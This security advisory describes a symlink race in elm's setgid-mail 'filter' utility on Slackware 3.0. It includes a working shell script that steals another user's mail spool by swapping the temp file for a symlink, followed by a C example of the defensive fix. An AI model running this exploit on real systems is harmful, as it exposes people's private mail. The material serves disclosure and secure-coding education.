COMMAND

    filter, an elm utility

SYSTEMS AFFECTED

    Linux - Slackware 3.0, others with sgid mail filter

PROBLEM

    The elm filter under Linux runs setgid mail, which allows it to
    freely read and write users' mail spools.  Only the integrity of
    its code protects the security of Linux's mail system, and in
    this respect it falls short.  Because filter fails to handle
    temporary files properly, a user can read or write any user's
    mail spool, a significant security hole.

    The specific problem exploited here is the way filter uses a
    temporary file to store its input and then sends that input back
    out according to the filter.  Because the code is modular, the
    main function in filter.c opens the temporary file, writes to it,
    and then closes it.  The mailmessage function is then called to
    forward the mail written to the temporary file to whatever
    destination is specified in the filter.  At the start of this
    process, the temporary file is opened again, and its contents are
    dumped to the mail spool of the user the mail is being forwarded
    to.

    At any point after the main filter function has first opened the
    file, the user running filter can rm it, since that user has
    permissions on the temp file.  The existing temp file can then be
    replaced with a symbolic link to any file that group mail has
    read permissions on.  When the mailmessage function opens it, the
    symbolic link is followed, and whatever file it points to is read
    in and its contents forwarded to the user specified in the mail
    spool.

------------------------------------------------------------------------------
#!/bin/sh
# This shell script exploits a problem with filter(1L):
# it will follow symbolic links on a read, allowing
# us to steal a user's mail file.
#
# Usage: fread.sh victimsusername
#
# Contents will be stored in ~/victimsusername.mail
#

cp /var/spool/mail/$LOGNAME ~
cp /dev/null /var/spool/mail/$LOGNAME
echo 'if (always) forward' $LOGNAME > /tmp/fread-ftr.tmp

cat << _EOF_ >> /tmp/fread-msg.tmp
From: Dave
To: $LOGNAME
Subject: Filter Exploit

_EOF_

echo sleep 2 > /tmp/fread-sh.tmp
echo cat /tmp/fread-msg.tmp >> /tmp/fread-sh.tmp
chmod +x /tmp/fread-sh.tmp
/tmp/fread-sh.tmp|filter -f /tmp/fread-ftr.tmp &
FREAD=`ps|grep 'filter -f'|grep -v grep|awk '{print $1}'`
rm -f /tmp/filter.$FREAD
ln -s /var/spool/mail/$1 /tmp/filter.$FREAD
sleep 2
rm -f /tmp/fread-ftr.tmp /tmp/fread-msg.tmp /tmp/fread-sh.tmp \
      /tmp/fread-ftr.tmp /tmp/filter.$FREAD
FREAD=
cp /var/spool/mail/$LOGNAME ~/$1.mail
cp ~/$LOGNAME /var/spool/mail
more ~/$1.mail
------------------------------------------------------------------------------
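
    The reopen-by-name flaw described under PROBLEM goes away when the
    program keeps the temporary file's descriptor open instead of
    closing the file and opening the path a second time.  The C code
    below is an added example, not elm's source or a vendor fix; the
    function names and the /tmp/filter.XXXXXX template are assumptions.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Added example (not elm's source; all names are hypothetical). Spool msg to a
 * private temp file: mkstemp() fills in tmpl and uses O_EXCL and mode 0600. */
int spool_message(const char *msg, char *tmpl)
{
    size_t len = strlen(msg);
    int fd = mkstemp(tmpl);
    if (fd < 0) return -1;
    if (write(fd, msg, len) != (ssize_t)len) { close(fd); unlink(tmpl); return -1; }
    return fd;              /* keep it open: later stages must use this fd */
}

/* Read the message back through the SAME descriptor, never by name. */
ssize_t read_spooled(int fd, char *buf, size_t cap)
{
    ssize_t n = pread(fd, buf, cap - 1, 0);
    if (n >= 0) buf[n] = '\0';
    return n;
}

/* Reopen by path only if it is not a symlink and is the same device/inode. */
int reopen_checked(const char *path, int orig_fd)
{
    struct stat a, b;
    int fd = open(path, O_RDONLY | O_NOFOLLOW);
    if (fd < 0) return -1;
    if (fstat(orig_fd, &a) < 0 || fstat(fd, &b) < 0 ||
        a.st_dev != b.st_dev || a.st_ino != b.st_ino) { close(fd); return -1; }
    return fd;
}

/* Constructed check: the path becomes a symlink after the file is spooled. */
int swap_is_harmless(void)
{
    char path[] = "/tmp/filter.XXXXXX", buf[64];
    int fd = spool_message("constructed message\n", path), ok;
    if (fd < 0 || unlink(path) < 0 || symlink("/dev/null", path) < 0) return 0;
    ok = reopen_checked(path, fd) == -1 && read_spooled(fd, buf, sizeof buf) == 20
         && strcmp(buf, "constructed message\n") == 0;
    unlink(path); close(fd);
    return ok;
}

int main(void) { return swap_is_harmless() ? 0 : 1; }
```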